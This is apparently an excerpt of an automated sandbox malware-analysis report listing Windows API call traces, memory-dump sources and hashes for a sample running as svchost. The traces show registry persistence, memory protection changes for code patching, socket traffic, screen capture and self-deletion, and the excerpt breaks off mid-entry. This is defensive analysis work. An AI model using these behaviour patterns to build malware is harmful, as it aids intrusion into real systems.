                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                • String ID: A1633F95a$software\microsoft
                                                                                                                                                                                                                • API String ID: 287100044-1894910394
                                                                                                                                                                                                                • Opcode ID: c6a2ab5d8d29f4e943d9d9fd9d3a150484ef343f78937ab2258337b61aca3bad
                                                                                                                                                                                                                • Instruction ID: e627a367c4b1eddb4bc09dc475371c44aa56d279cb4fc9b3f3dca43a57332034
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6a2ab5d8d29f4e943d9d9fd9d3a150484ef343f78937ab2258337b61aca3bad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F03175D80218FBD710DBA0EC4DF9D7738AB08701F504554FA02A2340D6749E5586F5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D236E7
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D236F9
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,?), ref: 02D23713
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,a1633e4fa,00000000,00000004,?,00000004), ref: 02D23730
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02D2373A
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D23744
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                • String ID: a1633e4fa$software\microsoft
                                                                                                                                                                                                                • API String ID: 287100044-77370241
                                                                                                                                                                                                                • Opcode ID: e6f20699daf392ebe734f4e79332b439a8aea850127d753c5e4f88603c7c5285
                                                                                                                                                                                                                • Instruction ID: 0e11d00cb17104a248a07a1bdf4db6cc89c3688f6658b00cb55ec5b168bd26e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6f20699daf392ebe734f4e79332b439a8aea850127d753c5e4f88603c7c5285
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF03175D80218FBD710DBA0EC5DF9D7738AB08705F504554FA02A2340D6749E5596F1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexitfree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3367576030-0
                                                                                                                                                                                                                • Opcode ID: 1d165b4dbc48dbcf790d2c1551a5a8fcf413b95a8f75c7bd49eb5cf08c946d06
                                                                                                                                                                                                                • Instruction ID: f1abcfd33a96292e104a852a0ba8f424fd9c990833c5286cb991b36a1df095a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d165b4dbc48dbcf790d2c1551a5a8fcf413b95a8f75c7bd49eb5cf08c946d06
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84617D75A00629AFDB10CF68C884BAE77A4FFA8318F104418FD459B348D771EE55CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • select.WS2_32(?,00000000,?,00000000,?), ref: 02D4DA31
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4DA4A
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4DA5A
                                                                                                                                                                                                                • free.MSVCRT(00000000), ref: 02D4DA69
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00002000,?,00000000), ref: 02D4DA95
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02D4DB77
                                                                                                                                                                                                                • free.MSVCRT ref: 02D4DB96
                                                                                                                                                                                                                • free.MSVCRT(?,?,00000000,00000000,00000000,?), ref: 02D4DBB3
                                                                                                                                                                                                                • free.MSVCRT(00000000), ref: 02D4DBB9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$malloc$CloseFileHandleReadselect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 158848325-0
                                                                                                                                                                                                                • Opcode ID: ca7acc68a3011e1633e6ab55307fe3f6c2a34525efa12d8472624b60f3c2c765
                                                                                                                                                                                                                • Instruction ID: d322d107405fe22c6c8172ec97d6175c5de949dde6411eb40dbf15d6748b1da2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca7acc68a3011e1633e6ab55307fe3f6c2a34525efa12d8472624b60f3c2c765
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8951C471A046049FDB10DFA89C84BFFB7FAEB45724F10056AE559D7380DA70AD41CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WindowFromDC.USER32(?), ref: 02D2C10C
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2C144
                                                                                                                                                                                                                • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02D2C152
                                                                                                                                                                                                                • GetClipRgn.GDI32(?,00000000), ref: 02D2C15C
                                                                                                                                                                                                                • SelectClipRgn.GDI32(00000000,00000000), ref: 02D2C16C
                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 02D2C173
                                                                                                                                                                                                                • GetViewportOrgEx.GDI32(?,?), ref: 02D2C17E
                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02D2C192
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2C1D3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3315380975-0
                                                                                                                                                                                                                • Opcode ID: 12d02ae00dbcbf1092d43373831f24409f53bc222dbc80f033b45393813f64d3
                                                                                                                                                                                                                • Instruction ID: f81045c7d60ec62a1b3365bbd313dd552bcef353b759c697d9bf3cefdd5fa71f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12d02ae00dbcbf1092d43373831f24409f53bc222dbc80f033b45393813f64d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA411776610205AFCB14CF98EC88EAB77B9EB8C715B108A09FA09C3340D634EC51CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401F70,?,0000001C), ref: 0040154F
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401565
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 00401572
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401589
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 004015A1
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004015BD
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 004015CC
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 004015D9
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004015ED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2787354276-0
                                                                                                                                                                                                                • Opcode ID: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
                                                                                                                                                                                                                • Instruction ID: 1f2af84f05926cbb5e0b354959f29bdceae47d8b45da359f5ec46e55e0df53d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F21FCB1D00219AFDB10DBA0DD49FEA77BCAB48700F0045AAA709F6190EB749B448FA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D503B0: select.WS2_32(?,?,00000000,00000000,?), ref: 02D50437
                                                                                                                                                                                                                  • Part of subcall function 02D503B0: __WSAFDIsSet.WS2_32(?,?), ref: 02D50468
                                                                                                                                                                                                                  • Part of subcall function 02D503B0: recv.WS2_32(?,?,00000005,00000000), ref: 02D5048B
                                                                                                                                                                                                                  • Part of subcall function 02D503B0: recv.WS2_32(?,?,00000004,00000000), ref: 02D504AD
                                                                                                                                                                                                                  • Part of subcall function 02D503B0: socket.WS2_32(00000002,00000001,00000000), ref: 02D504C6
                                                                                                                                                                                                                  • Part of subcall function 02D503B0: setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02D504E2
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4A033
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 02D4A107
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 02D4A152
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(00000000,?), ref: 02D4A1E4
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(SYSTEM!528110!3DEABDE9,?), ref: 02D4A232
                                                                                                                                                                                                                • free.MSVCRT(00000000), ref: 02D4A2EF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SystemTime$recv$freemallocselectsetsockoptsocket
                                                                                                                                                                                                                • String ID: SYSTEM!528110!3DEABDE9
                                                                                                                                                                                                                • API String ID: 2153857484-4108202809
                                                                                                                                                                                                                • Opcode ID: afb650192e174b49911ac4f1257e99f7a50360cadf3613ad937c32d6c83c7364
                                                                                                                                                                                                                • Instruction ID: c00129eda87952c9242a6b971c25e770ad36fb0c8b65a60f7bc69205326791c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: afb650192e174b49911ac4f1257e99f7a50360cadf3613ad937c32d6c83c7364
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D191B231A406458FDB28CF28C1A87BEBBF5EF44304F14466DE4969B784DB35B981CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3AAD7
                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 02D3AAFA
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D3ABCB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D3ABDC
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02D3ABEC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCurrentHandleModuleProcProcessVersionmemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 877405840-3024904723
                                                                                                                                                                                                                • Opcode ID: 207314704e22131e373bdc1270cada7d3fe05d2476992119e7c6c3be6e67e1c5
                                                                                                                                                                                                                • Instruction ID: d005d8d5e3c7210f550b3f078d3ff16ed8125a61c1a6dfc1e430372a3e4b0f0d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 207314704e22131e373bdc1270cada7d3fe05d2476992119e7c6c3be6e67e1c5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF317C70B00259CBDF7ACF54D899BF973B6AF01304F5401ADD6869A380EB759E94CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D35628
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(02D3676C,a16338a8a,00000000,?,00000000,?), ref: 02D3566A
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02D3676C), ref: 02D35674
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(-80000001), ref: 02D3563A
                                                                                                                                                                                                                  • Part of subcall function 02D23600: IsUserAnAdmin.SHELL32 ref: 02D23608
                                                                                                                                                                                                                  • Part of subcall function 02D23600: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D35686), ref: 02D2363F
                                                                                                                                                                                                                  • Part of subcall function 02D23600: RegQueryValueExA.ADVAPI32(02D35686,a1633e4fa,00000000,?,00000000,?), ref: 02D2365C
                                                                                                                                                                                                                  • Part of subcall function 02D23600: RegCloseKey.ADVAPI32(02D35686), ref: 02D23666
                                                                                                                                                                                                                  • Part of subcall function 02D23600: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D23699
                                                                                                                                                                                                                  • Part of subcall function 02D23600: RegQueryValueExA.ADVAPI32(?,a1633e4fa,00000000,?,00000000,?), ref: 02D236B6
                                                                                                                                                                                                                  • Part of subcall function 02D23600: RegCloseKey.ADVAPI32(?), ref: 02D236C0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: A1633711a$a16338a8a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-4201954786
                                                                                                                                                                                                                • Opcode ID: feea12197fbc0493c78e620da57b6f0b85a13bbbcf9644abdb0be2894c0afcaa
                                                                                                                                                                                                                • Instruction ID: ed5723a2c30ea60241b0ac4094d949524c47f1ba31d11cc39882910975c39bd9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: feea12197fbc0493c78e620da57b6f0b85a13bbbcf9644abdb0be2894c0afcaa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5014075E90209ABDB00DBB4EC4ABAEB7B8EB08705F504658F515D6380E678DD448BA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A078
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D3A0A0
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A135
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A14A
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,02D3938A,?,?,?,00000000,00000000,?,?,?,?,?,?,02D3938A,00000000), ref: 02D3A17A
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,02D3938A,?,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A186
                                                                                                                                                                                                                  • Part of subcall function 02D3A1B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02D3A193,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1BC
                                                                                                                                                                                                                  • Part of subcall function 02D3A1B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1C6
                                                                                                                                                                                                                  • Part of subcall function 02D3A1B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1CD
                                                                                                                                                                                                                  • Part of subcall function 02D3A1B0: memset.MSVCRT ref: 02D3A1DE
                                                                                                                                                                                                                  • Part of subcall function 02D3A1B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A22A
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A197
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A19E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2609073853-0
                                                                                                                                                                                                                • Opcode ID: cb69586fc841348108fa1a634fc6582098ddab12e2afac379e66243df175e05c
                                                                                                                                                                                                                • Instruction ID: 0c65ced7532ae9a2a1f4d71a4477ad3d3c01dbd5681c7132086653f3d33db38b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb69586fc841348108fa1a634fc6582098ddab12e2afac379e66243df175e05c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4412976B40216ABCB119F78CC88FBA7B6AEF40254F14412DE98997388DA75DD01C7F0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,02D6AD0C,?,00000001,?), ref: 02D4D83C
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D4D856
                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 02D4D865
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(000004E3,00000000,?,00000001,?,00000001,00000000,00000000), ref: 02D4D883
                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 02D4D88C
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(000004E3,00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D4D8AD
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 02D4D8ED
                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 02D4D8FC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: lstrlen$ByteCharFindMultiWide$CloseFileNextmemcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2429061842-0
                                                                                                                                                                                                                • Opcode ID: 01e0f5ba658b3cba2a60a096ee4f10faff3a84cd0cf6d9cc0a8026068d58b578
                                                                                                                                                                                                                • Instruction ID: fd8893b7b509f7837e8fbd1c0a61b219fb111d3f307b8ddbe837e5fff4626fd2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01e0f5ba658b3cba2a60a096ee4f10faff3a84cd0cf6d9cc0a8026068d58b578
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B52188726402196BEB21DBA0DC49FEA7779AB84700F104595F609EB180EB71AA45CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,7604DB30,?,00401E75,00000000), ref: 00401317
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00401E75,00000000), ref: 0040132C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040133B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,00401E75,00000000,?,00401E75,00000000), ref: 0040134D
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040135D
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 0040136A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040138C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040139D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Handle$CloseCreateInformationLockPointerUnlockWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1080409958-0
                                                                                                                                                                                                                • Opcode ID: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
                                                                                                                                                                                                                • Instruction ID: fc3a19f52fd50960abd89716b3b21a8dc97a86bf959a0b9d512ee5003149b17c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E21BE71A00204BBF7205B65DD4DFAB7A6CEBC1B51F148126FF00B66E0D7B84E81C6A8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02D2DB0C
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2DB0F
                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 02D2DB21
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02D2DB32
                                                                                                                                                                                                                • GetClassNameA.USER32(00000000,?,00000101), ref: 02D2DB4C
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 02D2DBA6
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000101,0000001B,C01B0000), ref: 02D2DBB5
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02D2DBBA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$MessagePost$ClassLongNameVisible
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4167699426-0
                                                                                                                                                                                                                • Opcode ID: 3decd5b175a85742f579486d143ebee1e64424f89963f3996e9e04efd5d4bfc5
                                                                                                                                                                                                                • Instruction ID: f7a3421179e5c7bfde4582ce180f599bfb7991e3b27fb899fcbe3d5d92c135d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3decd5b175a85742f579486d143ebee1e64424f89963f3996e9e04efd5d4bfc5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51215B316802642AE7309A35ECADFEB7379EB19725F000614FA81E63C0D7A4EC94C574
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02D28388
                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 02D283A8
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 02D283B1
                                                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 02D283BD
                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 02D283F2
                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D28411
                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 02D28433
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 02D28441
                                                                                                                                                                                                                Memory Dump Source
